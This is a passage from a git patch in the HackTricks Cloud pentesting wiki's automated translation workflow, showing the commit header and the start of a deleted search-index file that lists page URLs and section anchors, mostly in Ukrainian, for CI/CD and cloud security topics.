From 7656b9c6922fc312a57f1754e49fc0b94fb6d3e5 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 21 Apr 2025 21:02:20 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation --- searchindex.json | 1 - src/images/venacus-logo.png | Bin 0 -> 9217 bytes .../az-authorization-privesc.md | 60 ++++++++---------- theme/ht_searcher.js | 57 ++++++++++++++--- 4 files changed, 72 insertions(+), 46 deletions(-) delete mode 100644 searchindex.json create mode 100644 src/images/venacus-logo.png diff --git a/searchindex.json b/searchindex.json deleted file mode 100644 index 264e46f00..000000000 --- a/searchindex.json +++ /dev/null @@ -1 +0,0 @@ -{"doc_urls":["index.html#hacktricks-cloud","index.html#Запустіть-hacktricks-cloud-локально","index.html#Методологія-pentesting-cicd","index.html#Методологія-pentesting-cloud","index.html#Ліцензія-та-відмова-від-відповідальності","index.html#Статистика-github","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pentesting-cicd-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#cicd-pipelines","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs-pentesting-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pipelines-pentesting-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#ppe---poisoned-pipeline-execution","pentesting-ci-cd/pentesting-ci-cd-methodology.html#exploitation-benefits","pentesting-ci-cd/pentesting-ci-cd-methodology.html#more-relevant-info","pentesting-ci-cd/pentesting-ci-cd-methodology.html#tools--cis-benchmark","pentesting-ci-cd/pentesting-ci-cd-methodology.html#top-10-cicd-security-risk","pentesting-ci-cd/pentesting-ci-cd-methodology.html#labs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#automatic-tools","pentesting-ci-cd/pentesting-ci-cd-methodology.html#references","pentesting-ci-cd/github-security/index.html#github-security","pentesting-ci-cd/github-security/index.html#Що-таке-github","pentesting-ci-cd/github-security/index.html#Основна-інформація","pentesting-ci-cd/github-security/index.html#Зовнішнє-розвідка","pentesting-ci-cd/github-security/index.html#github-dorks","pentesting-ci-cd/github-security/index.html#github-Витоки","pentesting-ci-cd/github-security/index.html#Зовнішні-форки","pentesting-ci-cd/github-security/index.html#github-Витоки-в-видаленихвнутрішніх-форках","pentesting-ci-cd/github-security/index.html#Укріплення-організації","pentesting-ci-cd/github-security/index.html#Привілеї-учасників","pentesting-ci-cd/github-security/index.html#Налаштування-дій","pentesting-ci-cd/github-security/index.html#Інтеграції","pentesting-ci-cd/github-security/index.html#Розвідка-та-атаки-що-зловживають-обліковими-даними","pentesting-ci-cd/github-security/index.html#З-обліковими-даними-користувача","pentesting-ci-cd/github-security/index.html#З-ssh-ключем-користувача","pentesting-ci-cd/github-security/index.html#З-токеном-користувача","pentesting-ci-cd/github-security/index.html#З-oauth-додатком","pentesting-ci-cd/github-security/index.html#З-додатком-github","pentesting-ci-cd/github-security/index.html#Компрометація-та-зловживання-github-action","pentesting-ci-cd/github-security/index.html#Обхід-захисту-гілок","pentesting-ci-cd/github-security/index.html#Обхід-захисту-середовищ","pentesting-ci-cd/github-security/index.html#Постійність","pentesting-ci-cd/github-security/index.html#Підроблені-коміти---Бекдор-через-коміти-репозиторію","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Зловживання-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Основна-інформація","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Резюме-наслідків","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_token","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Дозволене-виконання","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Виконання-з-створення-репозиторію","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Виконання-з-нової-гілки","pentesting-ci-cd/github-security/abusing-github-actions/index.html#forked-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request_target","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_run","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_call","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Зловживання-виконанням-з-форку","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Виконання-недовіреного-чекауту","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Впровадження-скриптів-у-контексті","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Впровадження-скриптів-github_env","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Вразливі-сторонні-дії-github","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Інший-зовнішній-доступ","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Викрадення-видаленого-простору-імен-репозиторію","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Поворот-репозиторію","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Отруєння-кешу","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Отруєння-артефактів","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Постексплуатація-з-дії","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Доступ-до-aws-та-gcp-через-oidc","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Доступ-до-секретів","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Зловживання-самостійно-хостованими-виконавцями","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github-docker-images-registry","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Чутлива-інформація-в-журналах-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Приховування-своїх-слідів","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Інструменти","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.html#gh-actions---Отруєння-артефактів","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.html#gh-actions---Пошкодження-кешу","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#gh-actions---Впровадження-скриптів-у-контексті","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Доступні-видалені-дані-в-github","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Доступ-до-видалених-даних-форків","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Доступ-до-видалених-даних-репозиторію","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Доступ-до-даних-приватного-репозиторію","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Як-виявити-коміти-з-видаленихприхованих-форків","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Прямий-доступ-до-коміту","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Брутфорсинг-коротких-sha-1-значень","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Посилання","pentesting-ci-cd/github-security/basic-github-information.html#Основна-інформація-про-github","pentesting-ci-cd/github-security/basic-github-information.html#Основна-структура","pentesting-ci-cd/github-security/basic-github-information.html#Привілеї","pentesting-ci-cd/github-security/basic-github-information.html#Ролі-підприємства","pentesting-ci-cd/github-security/basic-github-information.html#Ролі-організації","pentesting-ci-cd/github-security/basic-github-information.html#Привілеї-членів","pentesting-ci-cd/github-security/basic-github-information.html#Ролі-репозиторіїв","pentesting-ci-cd/github-security/basic-github-information.html#Команди","pentesting-ci-cd/github-security/basic-github-information.html#Користувачі","pentesting-ci-cd/github-security/basic-github-information.html#Аутентифікація-github","pentesting-ci-cd/github-security/basic-github-information.html#Веб-доступ","pentesting-ci-cd/github-security/basic-github-information.html#ssh-ключі","pentesting-ci-cd/github-security/basic-github-information.html#Персональні-токени-доступу","pentesting-ci-cd/github-security/basic-github-information.html#oauth-додатки","pentesting-ci-cd/github-security/basic-github-information.html#Додатки-github","pentesting-ci-cd/github-security/basic-github-information.html#github-actions","pentesting-ci-cd/github-security/basic-github-information.html#git-actions","pentesting-ci-cd/github-security/basic-github-information.html#Налаштування","pentesting-ci-cd/github-security/basic-github-information.html#git-secrets","pentesting-ci-cd/github-security/basic-github-information.html#git-environments","pentesting-ci-cd/github-security/basic-github-information.html#git-action-runner","pentesting-ci-cd/github-security/basic-github-information.html#git-action-compromise","pentesting-ci-cd/github-security/basic-github-information.html#branch-protections","pentesting-ci-cd/github-security/basic-github-information.html#references","pentesting-ci-cd/gitea-security/index.html#gitea-security","pentesting-ci-cd/gitea-security/index.html#Що-таке-gitea","pentesting-ci-cd/gitea-security/index.html#Основна-інформація","pentesting-ci-cd/gitea-security/index.html#Лабораторія","pentesting-ci-cd/gitea-security/index.html#Неавтентифіковане-перерахування","pentesting-ci-cd/gitea-security/index.html#Внутрішня-експлуатація","pentesting-ci-cd/gitea-security/index.html#З-обліковими-даними-користувачавеб-кукі","pentesting-ci-cd/gitea-security/index.html#З-ssh-ключем-користувача","pentesting-ci-cd/gitea-security/index.html#З-токеном-користувача","pentesting-ci-cd/gitea-security/index.html#З-oauth-додатком","pentesting-ci-cd/gitea-security/index.html#Обхід-захисту-гілок","pentesting-ci-cd/gitea-security/index.html#Перерахувати-вебхуки","pentesting-ci-cd/gitea-security/index.html#Постексплуатація","pentesting-ci-cd/gitea-security/index.html#Всередині-сервера","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Основна-інформація-про-gitea","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Основна-структура","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Дозволи","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Організації","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Команди-та-користувачі","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Аутентифікація-gitea","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Веб-доступ","pentesting-ci-cd/gitea-security/basic-gitea-information.html#ssh-ключі","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Особисті-токени-доступу","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Додатки-oauth","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Ключі-для-розгортання","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Захист-гілок","pentesting-ci-cd/concourse-security/index.html#concourse-security","pentesting-ci-cd/concourse-security/index.html#Основна-інформація","pentesting-ci-cd/concourse-security/index.html#Архітектура-concourse","pentesting-ci-cd/concourse-security/index.html#Лабораторія-concourse","pentesting-ci-cd/concourse-security/index.html#Перерахунок-та-атака-на-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#Архітектура-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#Архітектура-concourse-1","pentesting-ci-cd/concourse-security/concourse-architecture.html#Архітектура","pentesting-ci-cd/concourse-security/concourse-architecture.html#Посилання","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#concourse-lab-creation","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#testing-environment","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#running-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Створити-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#steps","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Простий-приклад-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#bash-скрипт-з-вихіднимвхідним-конвеєром","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Тригери","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks-1","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#user-roles--permissions","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#vars--credential-manager","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#Перерахування-concourse","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#Атаки-на-concourse","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#Посилання","pentesting-ci-cd/circleci-security.html#circleci-security","pentesting-ci-cd/circleci-security.html#basic-information","pentesting-ci-cd/circleci-security.html#permissions","pentesting-ci-cd/circleci-security.html#env-variables--secrets","pentesting-ci-cd/circleci-security.html#Атаки","pentesting-ci-cd/travisci-security/index.html#travisci-security","pentesting-ci-cd/travisci-security/index.html#Що-таке-travisci","pentesting-ci-cd/travisci-security/index.html#Атаки","pentesting-ci-cd/travisci-security/index.html#Тригери","pentesting-ci-cd/travisci-security/index.html#pr-від-третіх-сторін","pentesting-ci-cd/travisci-security/index.html#Витік-секретів","pentesting-ci-cd/travisci-security/index.html#todo","pentesting-ci-cd/travisci-security/index.html#travisci-enterprise","pentesting-ci-cd/travisci-security/index.html#Посилання","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Основна-інформація-про-travisci","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Доступ","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Зашифровані-секрети","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Змінні-середовища","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Користувацькі-зашифровані-секрети","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Користувацькі-зашифровані-файли","pentesting-ci-cd/travisci-security/basic-travisci-information.html#travisci-enterprise","pentesting-ci-cd/jenkins-security/index.html#jenkins-security","pentesting-ci-cd/jenkins-security/index.html#Основна-інформація","pentesting-ci-cd/jenkins-security/index.html#Неавтентифіковане-перерахування","pentesting-ci-cd/jenkins-security/index.html#Відомі-вразливості","pentesting-ci-cd/jenkins-security/index.html#Увійти","pentesting-ci-cd/jenkins-security/index.html#Реєстрація","pentesting-ci-cd/jenkins-security/index.html#sso-Вхід","pentesting-ci-cd/jenkins-security/index.html#Брутфорс","pentesting-ci-cd/jenkins-security/index.html#password-spraying","pentesting-ci-cd/jenkins-security/index.html#ip-whitelisting-bypass","pentesting-ci-cd/jenkins-security/index.html#internal-jenkins-abuses","pentesting-ci-cd/jenkins-security/index.html#listing-users","pentesting-ci-cd/jenkins-security/index.html#dumping-builds-to-find-cleartext-secrets","pentesting-ci-cd/jenkins-security/index.html#Викрадення-ssh-облікових-даних","pentesting-ci-cd/jenkins-security/index.html#rce-в-jenkins","pentesting-ci-cd/jenkins-security/index.html#rce-СтворенняМодифікація-проекту","pentesting-ci-cd/jenkins-security/index.html#rce-Виконання-groovy-скрипту","pentesting-ci-cd/jenkins-security/index.html#rce-СтворенняМодифікація-pipeline","pentesting-ci-cd/jenkins-security/index.html#Експлуатація-pipeline","pentesting-ci-cd/jenkins-security/index.html#Будівельні-pipeline","pentesting-ci-cd/jenkins-security/index.html#pipeline-rce","pentesting-ci-cd/jenkins-security/index.html#Перевірка-змінних-середовища","pentesting-ci-cd/jenkins-security/index.html#Витягування-секретів","pentesting-ci-cd/jenkins-security/index.html#Тригери","pentesting-ci-cd/jenkins-security/index.html#Вузли-та-Агенти","pentesting-ci-cd/jenkins-security/index.html#Повний-приклад","pentesting-ci-cd/jenkins-security/index.html#Читання-довільних-файлів-до-rce","pentesting-ci-cd/jenkins-security/index.html#rce","pentesting-ci-cd/jenkins-security/index.html#Після-експлуатації","pentesting-ci-cd/jenkins-security/index.html#metasploit","pentesting-ci-cd/jenkins-security/index.html#jenkins-secrets","pentesting-ci-cd/jenkins-security/index.html#Створити-нового-адміністратора","pentesting-ci-cd/jenkins-security/index.html#Посилання","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Основна-інформація-про-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Доступ","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Імя-користувача--Пароль","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#cookie","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssoПлагіни","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Токени","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssh-Ключі","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Авторизація","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Область-безпеки","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Вузли-агенти-та-виконавці-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Секрети-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Шифрування-секретів-і-облікових-даних","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Доступ-до-облікових-даних","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Посилання","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-з-groovy-script","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-з-groovy-script-1","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#Зворотний-шелл-у-linux","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#Зворотний-шелл-у-windows","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#Скрипт","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#jenkins-rce-СтворенняМодифікація-Проекту","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#Створення-Проекту","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#Модифікація-Проекту","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#Виконання","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#jenkins-rce-СтворенняМодифікація-Пайплайну","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#Створення-нового-Пайплайну","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#Модифікація-конвеєра","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#jenkins-arbitrary-file-read-to-rce-via-remember-me","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#attack-prerequisites","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#detailed-exploitation-process","pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.html#jenkins-dumping-secrets-from-groovy","pentesting-ci-cd/apache-airflow-security/index.html#apache-airflow-security","pentesting-ci-cd/apache-airflow-security/index.html#Основна-інформація","pentesting-ci-cd/apache-airflow-security/index.html#Локальна-лабораторія","pentesting-ci-cd/apache-airflow-security/index.html#Налаштування-airflow","pentesting-ci-cd/apache-airflow-security/index.html#rbac-airflow","pentesting-ci-cd/apache-airflow-security/index.html#Атаки","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#Налаштування-airflow","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#Файл-конфігурації","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#api","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#atlas","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#celery","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#core","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#dask","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#kerberos","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#logging","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#secrets","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#smtp","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#webserver","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#Веб-аутентифікація","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#Стандартні-дозволи","pentesting-ci-cd/terraform-security.html#terraform-security","pentesting-ci-cd/terraform-security.html#Основна-інформація","pentesting-ci-cd/terraform-security.html#Лабораторія-terraform","pentesting-ci-cd/terraform-security.html#rce-в-terraform-отруєння-конфігураційного-файлу","pentesting-ci-cd/terraform-security.html#terraform-plan","pentesting-ci-cd/terraform-security.html#terraform-apply","pentesting-ci-cd/terraform-security.html#Витоки-секретів","pentesting-ci-cd/terraform-security.html#Зловживання-файлами-стану-terraform","pentesting-ci-cd/terraform-security.html#rce-в-terraform-отруєння-конфігураційного-файлу-1","pentesting-ci-cd/terraform-security.html#Видалення-ресурсів","pentesting-ci-cd/terraform-security.html#Замініть-заблокований-провайдер","pentesting-ci-cd/terraform-security.html#Автоматизовані-інструменти-аудиту","pentesting-ci-cd/terraform-security.html#snyk-infrastructure-as-code-iac","pentesting-ci-cd/terraform-security.html#checkov","pentesting-ci-cd/terraform-security.html#terraform-compliance","pentesting-ci-cd/terraform-security.html#tfsec","pentesting-ci-cd/terraform-security.html#kicks","pentesting-ci-cd/terraform-security.html#terrascan","pentesting-ci-cd/terraform-security.html#Посилання","pentesting-ci-cd/atlantis-security.html#atlantis-security","pentesting-ci-cd/atlantis-security.html#basic-information","pentesting-ci-cd/atlantis-security.html#local-lab","pentesting-ci-cd/atlantis-security.html#atlantis-access","pentesting-ci-cd/atlantis-security.html#server-configuration","pentesting-ci-cd/atlantis-security.html#atlantis-commands","pentesting-ci-cd/atlantis-security.html#Атаки","pentesting-ci-cd/atlantis-security.html#post-exploitation","pentesting-ci-cd/atlantis-security.html#mitigations","pentesting-ci-cd/atlantis-security.html#references","pentesting-ci-cd/cloudflare-security/index.html#cloudflare-security","pentesting-ci-cd/cloudflare-security/index.html#websites","pentesting-ci-cd/cloudflare-security/index.html#domain-registration","pentesting-ci-cd/cloudflare-security/index.html#analytics","pentesting-ci-cd/cloudflare-security/index.html#pages","pentesting-ci-cd/cloudflare-security/index.html#workers","pentesting-ci-cd/cloudflare-security/index.html#r2","pentesting-ci-cd/cloudflare-security/index.html#stream","pentesting-ci-cd/cloudflare-security/index.html#images","pentesting-ci-cd/cloudflare-security/index.html#security-center","pentesting-ci-cd/cloudflare-security/index.html#turnstile","pentesting-ci-cd/cloudflare-security/index.html#zero-trust","pentesting-ci-cd/cloudflare-security/index.html#bulk-redirects","pentesting-ci-cd/cloudflare-security/index.html#notifications","pentesting-ci-cd/cloudflare-security/index.html#manage-account","pentesting-ci-cd/cloudflare-security/index.html#ddos-investigation","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#cloudflare-domains","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Огляд","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Аналітика","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#dns","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Електронна-пошта","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#spectrum","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#ssltls","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Безпека","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Доступ","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Швидкість","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Кешування","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Маршрути-workers","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Правила","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Мережа","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Трафік","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Користувацькі-сторінки","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#Додатки","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#scrape-shield","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#zaraz","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#web3","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#cloudflare-zero-trust-network","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#Аналітика","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#Шлюз","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#Доступ","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#Моя-команда","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#Журнали","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#Налаштування","pentesting-ci-cd/okta-security/index.html#okta-security","pentesting-ci-cd/okta-security/index.html#Основна-інформація","pentesting-ci-cd/okta-security/index.html#Резюме","pentesting-ci-cd/okta-security/index.html#Атаки","pentesting-ci-cd/okta-security/index.html#Локалізація-порталу-okta","pentesting-ci-cd/okta-security/index.html#Увійти-в-okta-через-kerberos","pentesting-ci-cd/okta-security/index.html#Викрадення-агента-ad-okta","pentesting-ci-cd/okta-security/index.html#Викрадення-ad-як-адміністратор","pentesting-ci-cd/okta-security/index.html#Фальшивий-постачальник-saml-okta","pentesting-ci-cd/okta-security/index.html#Фішинг-порталу-okta-з-evilgnix","pentesting-ci-cd/okta-security/index.html#Атака-на-підроблення-колеги","pentesting-ci-cd/okta-security/index.html#Уникнення-політик-виявлення-поведінки","pentesting-ci-cd/okta-security/index.html#Укріплення-okta","pentesting-ci-cd/okta-security/index.html#Посилання","pentesting-ci-cd/okta-security/okta-hardening.html#okta-hardening","pentesting-ci-cd/okta-security/okta-hardening.html#directory","pentesting-ci-cd/okta-security/okta-hardening.html#people","pentesting-ci-cd/okta-security/okta-hardening.html#groups","pentesting-ci-cd/okta-security/okta-hardening.html#devices","pentesting-ci-cd/okta-security/okta-hardening.html#profile-editor","pentesting-ci-cd/okta-security/okta-hardening.html#directory-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#profile-sources","pentesting-ci-cd/okta-security/okta-hardening.html#customizations","pentesting-ci-cd/okta-security/okta-hardening.html#brands","pentesting-ci-cd/okta-security/okta-hardening.html#sms","pentesting-ci-cd/okta-security/okta-hardening.html#end-user-dashboard","pentesting-ci-cd/okta-security/okta-hardening.html#other","pentesting-ci-cd/okta-security/okta-hardening.html#applications","pentesting-ci-cd/okta-security/okta-hardening.html#applications-1","pentesting-ci-cd/okta-security/okta-hardening.html#identity-governance","pentesting-ci-cd/okta-security/okta-hardening.html#access-certifications","pentesting-ci-cd/okta-security/okta-hardening.html#security","pentesting-ci-cd/okta-security/okta-hardening.html#general","pentesting-ci-cd/okta-security/okta-hardening.html#healthinsight","pentesting-ci-cd/okta-security/okta-hardening.html#authenticators","pentesting-ci-cd/okta-security/okta-hardening.html#authentication-policies","pentesting-ci-cd/okta-security/okta-hardening.html#global-session-policy","pentesting-ci-cd/okta-security/okta-hardening.html#identity-providers","pentesting-ci-cd/okta-security/okta-hardening.html#delegated-authentication","pentesting-ci-cd/okta-security/okta-hardening.html#network","pentesting-ci-cd/okta-security/okta-hardening.html#device-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#api","pentesting-ci-cd/okta-security/okta-hardening.html#workflow","pentesting-ci-cd/okta-security/okta-hardening.html#automations","pentesting-ci-cd/okta-security/okta-hardening.html#reports","pentesting-ci-cd/okta-security/okta-hardening.html#reports-1","pentesting-ci-cd/okta-security/okta-hardening.html#system-log","pentesting-ci-cd/okta-security/okta-hardening.html#import-monitoring","pentesting-ci-cd/okta-security/okta-hardening.html#rate-limits","pentesting-ci-cd/okta-security/okta-hardening.html#settings","pentesting-ci-cd/okta-security/okta-hardening.html#account","pentesting-ci-cd/okta-security/okta-hardening.html#downloads","pentesting-ci-cd/serverless.com-security.html#serverlesscom-security","pentesting-ci-cd/serverless.com-security.html#Основна-інформація","pentesting-ci-cd/serverless.com-security.html#Організація","pentesting-ci-cd/serverless.com-security.html#Команда","pentesting-ci-cd/serverless.com-security.html#Додаток","pentesting-ci-cd/serverless.com-security.html#Сервіси","pentesting-ci-cd/serverless.com-security.html#tutorial","pentesting-ci-cd/serverless.com-security.html#Огляд-безпеки-serverlesscom","pentesting-ci-cd/serverless.com-security.html#Неправильно-налаштовані-iam-ролі-та-дозволи","pentesting-ci-cd/serverless.com-security.html#Небезпечні-секрети-та-управління-конфігурацією","pentesting-ci-cd/serverless.com-security.html#Вразливий-код-і-залежності","pentesting-ci-cd/serverless.com-security.html#Недостатнє-ведення-журналів-і-моніторинг","pentesting-ci-cd/serverless.com-security.html#Небезпечні-конфігурації-api-gateway","pentesting-ci-cd/serverless.com-security.html#Недостатня-ізоляція-функцій","pentesting-ci-cd/serverless.com-security.html#Недостатній-захист-даних","pentesting-ci-cd/serverless.com-security.html#Відсутність-належної-обробки-помилок","pentesting-ci-cd/serverless.com-security.html#Небезпечні-практики-розгортання","pentesting-ci-cd/serverless.com-security.html#Вразливості-в-плагінах-і-розширеннях","pentesting-ci-cd/serverless.com-security.html#Витік-чутливих-кінцевих-точок","pentesting-ci-cd/serverless.com-security.html#Надмірні-дозволи-для-членів-команди-та-зовнішніх-співробітників","pentesting-ci-cd/serverless.com-security.html#Безпека-ключів-доступу-та-ліцензійних-ключів","pentesting-ci-cd/supabase-security.html#supabase-security","pentesting-ci-cd/supabase-security.html#Основна-інформація","pentesting-ci-cd/supabase-security.html#Піддомен","pentesting-ci-cd/supabase-security.html#Конфігурація-бази-даних","pentesting-ci-cd/supabase-security.html#Конфігурація-api","pentesting-ci-cd/supabase-security.html#анонімні-api-ключі","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#ansible-tower--awx--automation-controller-security","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#basic-information","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#differences","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#tech-stack","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#logical-components","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#job-execution-flow","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#awx-lab-creation-for-testing","pentesting-ci-cd/ansible-towe